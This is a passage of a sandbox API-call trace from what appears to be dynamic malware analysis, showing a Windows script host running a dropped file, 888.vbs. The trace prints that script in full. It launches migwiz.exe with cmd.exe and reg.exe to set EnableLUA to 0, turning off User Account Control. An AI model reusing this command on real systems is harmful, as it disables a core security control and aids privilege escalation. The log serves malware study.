CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff2a1cf8, lpParameter=0x3159f0, dwCreationFlags=0x0, lpThreadId=0x315a18 | out: lpThreadId=0x315a18*=0xb6c) returned 0xd4 [0146.909] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1af030*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0147.259] CloseHandle (hObject=0xcc) returned 1 [0147.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", nBufferLength=0x104, lpBuffer=0x1af0c0, lpFilePart=0x1af0b0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", lpFilePart=0x1af0b0*="888.vbs") returned 0x2c [0147.259] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae5d0 | out: phkResult=0x1ae5d0*=0xe6) returned 0x0 [0147.259] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae580, lpData=0x1ae5e0, lpcbData=0x1ae584*=0x800 | out: lpType=0x1ae580*=0x1, lpData="VBSFile", lpcbData=0x1ae584*=0x10) returned 0x0 [0147.260] RegCloseKey (hKey=0xe6) returned 0x0 [0147.260] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae5d0 | out: phkResult=0x1ae5d0*=0xe6) returned 0x0 [0147.260] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1ae580, lpData=0x1aee50, lpcbData=0x1ae584*=0x200 | out: lpType=0x1ae580*=0x1, lpData="VBScript", lpcbData=0x1ae584*=0x12) returned 0x0 [0147.260] RegCloseKey (hKey=0xe6) returned 0x0 [0147.260] ??2@YAPEAX_K@Z () returned 0x315a30 [0147.260] GetProcessHeap () returned 0x390000 [0147.260] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x2000) returned 0x3c83c0 [0147.260] CLSIDFromString (in: lpsz="VBScript", pclsid=0x1aedc8 | out: pclsid=0x1aedc8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0147.261] CoCreateInstance (in: rclsid=0x1aedc8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff291800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1aedc0 | out: ppv=0x1aedc0*=0x316640) returned 0x0 [0148.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1acfc0 | out: lpSystemTimeAsFileTime=0x1acfc0*(dwLowDateTime=0xa6835f0, dwHighDateTime=0x1d509d7)) [0148.867] GetCurrentProcessId () returned 0xb60 [0148.867] GetCurrentThreadId () returned 0xb64 [0148.867] GetTickCount () returned 0x2fa84 [0148.867] QueryPerformanceCounter (in: lpPerformanceCount=0x1acfc8 | out: lpPerformanceCount=0x1acfc8*=25008724990) returned 1 [0148.867] malloc (_Size=0x100) returned 0x3164d0 [0148.867] __dllonexit () returned 0x7fef3aabfc0 [0148.867] __dllonexit () returned 0x7fef3aabfa8 [0148.867] __dllonexit () returned 0x7fef3aabfd4 [0148.868] GetUserDefaultLCID () returned 0x409 [0148.868] GetVersion () returned 0x1db10106 [0148.868] ??2@YAPEAX_K@Z () returned 0x3165e0 [0148.869] ??2@YAPEAX_K@Z () returned 0x316640 [0148.869] GetUserDefaultLCID () returned 0x409 [0148.869] GetACP () returned 0x4e4 [0148.869] ??3@YAXPEAX@Z () returned 0x5c5fb101 [0148.870] GetCurrentThreadId () returned 0xb64 [0148.870] ??2@YAPEAX_K@Z () returned 0x3169d0 [0148.870] GetCurrentThreadId () returned 0xb64 [0148.870] ??2@YAPEAX_K@Z () returned 0x3165e0 [0148.870] ??2@YAPEAX_K@Z () returned 0x316ab0 [0148.870] ??2@YAPEAX_K@Z () returned 0x316af0 [0148.870] ??2@YAPEAX_K@Z () returned 0x316bc0 [0148.870] GetCurrentThreadId () returned 0xb64 [0148.870] ??2@YAPEAX_K@Z () returned 0x316c00 [0148.870] GetUserDefaultLCID () returned 0x409 [0148.870] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0148.870] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1aed20, cchData=6 | out: lpLCData="1252") returned 5 [0148.871] IsValidCodePage (CodePage=0x4e4) returned 1 [0148.871] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe2b0000 [0148.874] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoCreateInstance") returned 0x7fefe2d7490 [0148.874] CoCreateInstance (in: rclsid=0x7fef3afd5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3afd5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x316988 | out: ppv=0x316988*=0x3c72f0) returned 0x0 [0148.875] IUnknown:AddRef (This=0x3c72f0) returned 0x2 [0148.875] GetCurrentProcessId () returned 0xb60 [0148.875] GetCurrentThreadId () returned 0xb64 [0148.875] GetTickCount () returned 0x2fa93 [0148.875] ISystemDebugEventFire:BeginSession (This=0x3c72f0, guidSourceID=0x7fef3afd5d8, strSessionName="VBScript:00002912:00002916:18195219") returned 0x0 [0148.875] GetCurrentThreadId () returned 0xb64 [0148.875] ??2@YAPEAX_K@Z () returned 0x316c90 [0148.875] ??2@YAPEAX_K@Z () returned 0x316ce0 [0148.875] malloc (_Size=0x80) returned 0x316de0 [0148.876] malloc (_Size=0x108) returned 0x316e70 [0148.876] GetCurrentThreadId () returned 0xb64 [0148.876] ??2@YAPEAX_K@Z () returned 0x316f80 [0148.876] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\888.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x100 [0148.876] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118 [0148.876] CreateFileMappingA (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x118, lpName=0x0) returned 0x104 [0148.876] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x320000 [0148.881] GetVersionExA (in: lpVersionInformation=0x1aeed0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd003301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1aeed0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0148.881] IsTextUnicode (in: lpv=0x320000, iSize=280, lpiResult=0x1aeec0 | out: lpiResult=0x1aeec0) returned 0 [0148.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320000, cbMultiByte=280, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 280 [0148.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320000, cbMultiByte=280, lpWideCharStr=0x3cf508, cchWideChar=280 | out: lpWideCharStr="File = \"C:\\Windows\\System32\\cmd.exe\"\r\nSet shll = CreateObject(\"Wscript.Shell\")\r\nshll.run(\"C:\\Windows\\System32\\migwiz\\migwiz.exe \" & File & \" /c %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\"),0,false") returned 280 [0148.881] UnmapViewOfFile (lpBaseAddress=0x320000) returned 1 [0148.881] CloseHandle (hObject=0x104) returned 1 [0148.881] CloseHandle (hObject=0x100) returned 1 [0148.882] GetSystemDirectoryA (in: lpBuffer=0x1aef48, uSize=0x0 | out: lpBuffer="\x8c\xf3\x1a") returned 0x14 [0148.882] ??2@YAPEAX_K@Z () returned 0x316610 [0148.882] GetSystemDirectoryA (in: lpBuffer=0x316610, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.882] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefdbf0000 [0148.882] ??3@YAXPEAX@Z () returned 0x5c5fb101 [0148.882] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferIdentifyLevel") returned 0x7fefdc0e470 [0148.882] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefdc0f9b0 [0148.882] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferCloseLevel") returned 0x7fefdc0f660 [0148.882] IdentifyCodeAuthzLevelW () returned 0x1 [0154.441] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ae0c0 | out: lpSystemTimeAsFileTime=0x1ae0c0*(dwLowDateTime=0xa90ad50, dwHighDateTime=0x1d509d7)) [0154.441] GetCurrentProcessId () returned 0xb60 [0154.441] GetCurrentThreadId () returned 0xb64 [0154.441] GetTickCount () returned 0x2fb8d [0154.441] QueryPerformanceCounter (in: lpPerformanceCount=0x1ae0c8 | out: lpPerformanceCount=0x1ae0c8*=25566177823) returned 1 [0154.441] malloc (_Size=0x100) returned 0x317a50 [0154.442] GetVersionExA (in: lpVersionInformation=0x1adea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf63af810, dwBuildNumber=0x7fe, dwPlatformId=0xf63a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x1adea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0154.442] GetUserDefaultLCID () returned 0x409 [0154.442] IsFileSupportedName () returned 0x1 [0154.442] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0154.447] GetSignedDataMsg () returned 0x0 [0154.447] GetCurrentProcess () returned 0xffffffffffffffff [0154.447] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x104, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1ae700, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1ae700*=0x130) returned 1 [0154.447] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118 [0154.447] ??2@YAPEAX_K@Z () returned 0x31a100 [0154.447] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.447] ReadFile (in: hFile=0x130, lpBuffer=0x31a100, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x1ae6e0, lpOverlapped=0x0 | out: lpBuffer=0x31a100*, lpNumberOfBytesRead=0x1ae6e0*=0x118, lpOverlapped=0x0) returned 1 [0154.447] CoInitialize (pvReserved=0x0) returned 0x1 [0154.448] CoCreateInstance (in: rclsid=0x7fef63af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef63af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x1ae650 | out: ppv=0x1ae650*=0x31a630) returned 0x0 [0154.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ac850 | out: lpSystemTimeAsFileTime=0x1ac850*(dwLowDateTime=0xa930eb0, dwHighDateTime=0x1d509d7)) [0154.766] GetCurrentProcessId () returned 0xb60 [0154.766] GetCurrentThreadId () returned 0xb64 [0154.766] GetTickCount () returned 0x2fb9c [0154.766] QueryPerformanceCounter (in: lpPerformanceCount=0x1ac858 | out: lpPerformanceCount=0x1ac858*=25598659096) returned 1 [0154.766] malloc (_Size=0x100) returned 0x317b60 [0154.766] __dllonexit () returned 0x7fef2e014c0 [0154.767] __dllonexit () returned 0x7fef2e014e8 [0154.767] GetVersionExA (in: lpVersionInformation=0x1ac630*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf2e02dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf2e014e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x1ac630*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0154.767] GetProcessWindowStation () returned 0x30 [0154.767] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x1ac618, nLength=0xc, lpnLengthNeeded=0x1ac610 | out: pvInfo=0x1ac618, lpnLengthNeeded=0x1ac610) returned 1 [0154.767] ??2@YAPEAX_K@Z () returned 0x31a220 [0154.767] ??2@YAPEAX_K@Z () returned 0x316610 [0154.767] ??2@YAPEAX_K@Z () returned 0x31a270 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a2b0 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a2f0 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a330 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a370 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a3b0 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a3f0 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a430 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a470 [0154.768] ??3@YAXPEAX@Z () returned 0x5c5fb101 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a4c0 [0154.768] ??2@YAPEAX_K@Z () returned 0x31a500 [0154.769] DllGetClassObject (in: rclsid=0x3ccf90*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe436cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ad320 | out: ppv=0x1ad320*=0x1bdfb0) returned 0x0 [0154.769] ??2@YAPEAX_K@Z () returned 0x1bdfb0 [0154.769] IClassFactory:CreateInstance (in: This=0x1bdfb0, pUnkOuter=0x0, riid=0x1ae100*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1ad340 | out: ppvObject=0x1ad340*=0x31a630) returned 0x0 [0154.769] ??2@YAPEAX_K@Z () returned 0x31a540 [0154.769] GetSystemInfo (in: lpSystemInfo=0x1ad180 | out: lpSystemInfo=0x1ad180*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0154.770] VirtualQuery (in: lpAddress=0x1ad1f0, lpBuffer=0x1ad1b0, dwLength=0x30 | out: lpBuffer=0x1ad1b0*(BaseAddress=0x1ad000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0154.770] ??2@YAPEAX_K@Z () returned 0x316610 [0154.770] ??2@YAPEAX_K@Z () returned 0x31a580 [0154.770] ??2@YAPEAX_K@Z () returned 0x31a5e0 [0154.770] ??2@YAPEAX_K@Z () returned 0x31a610 [0154.770] ??2@YAPEAX_K@Z () returned 0x31a6c0 [0154.770] IUnknown:AddRef (This=0x31a630) returned 0x2 [0154.770] IUnknown:Release (This=0x31a630) returned 0x1 [0154.770] IUnknown:Release (This=0x1bdfb0) returned 0x0 [0154.770] ??3@YAXPEAX@Z () returned 0x5c5fb101 [0154.770] IUnknown:QueryInterface (in: This=0x31a630, riid=0x7fef63af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1ae588 | out: ppvObject=0x1ae588*=0x31a630) returned 0x0 [0154.771] IUnknown:Release (This=0x31a630) returned 0x1 [0154.771] _strnicmp (_Str1="